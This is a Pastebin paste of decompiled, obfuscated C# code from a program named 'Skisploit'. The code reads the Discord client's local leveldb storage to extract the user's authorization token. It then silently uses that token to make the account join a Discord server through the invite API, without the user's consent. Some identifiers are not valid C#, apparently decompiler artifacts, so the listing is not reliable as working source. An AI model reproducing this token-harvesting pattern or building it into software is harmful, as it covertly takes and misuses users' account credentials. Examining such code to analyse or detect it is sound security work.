Advertisement
Guest User

Untitled

a guest
Jun 17th, 2019
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 1.84 KB | None | 0 0
  1. public static void AssemblyTrademarkAttribute(string A_0)
  2.         {
  3.             Koi.SerializationEvents(4);
  4.             if (!A_0.Contains("http"))
  5.             {
  6.                 A_0 = "http://" + A_0;
  7.             }
  8.             A_0 = BitArrayEnumeratorSimple.FixedSizeList(A_0);
  9.             A_0 = A_0.Replace("discord.gg/", "");
  10.             A_0 = A_0.Replace("https://", "");
  11.             A_0 = A_0.Replace("http://", "");
  12.             A_0 = A_0.Replace("www.", "");
  13.             A_0 = A_0.Replace("discordapp.com/", "");
  14.             A_0 = A_0.Replace("invite/", "");
  15.             string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\";
  16.             if (!BitArrayEnumeratorSimple.StaticArrayInitTypeSize=6(ref text) && !BitArrayEnumeratorSimple.SerObjectInfoInit(ref text))
  17.             {
  18.                 Console.WriteLine("No valid .ldb or .log file found");
  19.             }
  20.             Process[] processesByName = Process.GetProcessesByName("Discord");
  21.             for (int i = 0; i < processesByName.Length; i++)
  22.             {
  23.             }
  24.             Thread.Sleep(100);
  25.             string text2 = BitArrayEnumeratorSimple.Constants(text, text.EndsWith(".log"));
  26.             if (text2 == "")
  27.             {
  28.                 text2 = "Not found";
  29.             }
  30.             try
  31.             {
  32.                 HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://discordapp.com/api/v6/invite/" + A_0);
  33.                 httpWebRequest.Method = "POST";
  34.                 httpWebRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0";
  35.                 httpWebRequest.AutomaticDecompression = DecompressionMethods.GZip;
  36.                 IMessageCtrlSTORECATEGORYINSTANCE.EnvironmentStringExpressionSet(httpWebRequest.Headers, "Authorization", text2);
  37.                 httpWebRequest.ContentLength = 0L;
  38.                 HttpWebResponse httpWebResponse = (HttpWebResponse)AppDomainLevelActivator.Decoder(httpWebRequest);
  39.             }
  40.             catch (Exception)
  41.             {
  42.                 MessageBox.Show("Skisploit has failed to join the official discord automatically. Please join it manually if you wish to...");
  43.             }
  44.         }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement